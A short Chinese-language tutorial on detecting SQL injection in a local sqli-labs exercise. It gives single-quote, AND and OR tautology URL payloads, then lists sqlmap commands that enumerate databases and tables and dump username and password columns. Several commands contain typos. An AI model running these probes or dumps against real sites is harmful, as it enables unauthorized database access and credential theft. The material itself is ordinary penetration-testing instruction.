SQL注入(二)

（一）SQL注入点的详细判断：
1、单引号判断
http://localhost/sqli/Less-1/?id=1’ 如果出现错误提示，则该网站可能就存在注入漏洞
2、and判断
http://localhost/sqli/Less-1/?id=1’ and 1=1–+ 这个条件永远都是真的，所以返回是正常页
http://localhost/sqli/Less-1/?id=1’ and 1=2–+ 如果报错那说明存在注入漏洞，还要看报的什么错，不可能报任何错都有注入漏洞的。
3、OR判断（or跟and判断方法不一样的，and是提交返回错误才有注入点，而OR是提交返回正确有注入点）
http://localhost/sqli/Less-1/?id=1’ or 1=1–+
http://localhost/sqli/Less-1/?id=1’ or 1=2–+
当着两个语句都是返回正确，这就是证明有注入点。
or和and的区别：高中应该都讲过，在这里简单说一下。or指的是两个条件中只要有一个正确即可表现为真，当两个条件都为真（假）时，总体为真（假），and所表现的是并列关系，两个条件同时为真时，总体才为真，当其中一个条件为假时，那么总体表现为假。
（二）掌握sqlmap的基本使用

判断是否存在注入： python sqlmap.py -u “url”
获取全部数据库： python sqlmap.py -U URL --dbs
获取当前数据库： python sqlmap.py -u URL --current-db
获取当 前数据库里所有表： python sqlmap.py -u URL -D DB–tables
获取表的字段: python sqlmap.py -u URL -D DB-T users - -columns
爆值: python sqlmap.py -u URL -D DB-T users -C “password, username” --dump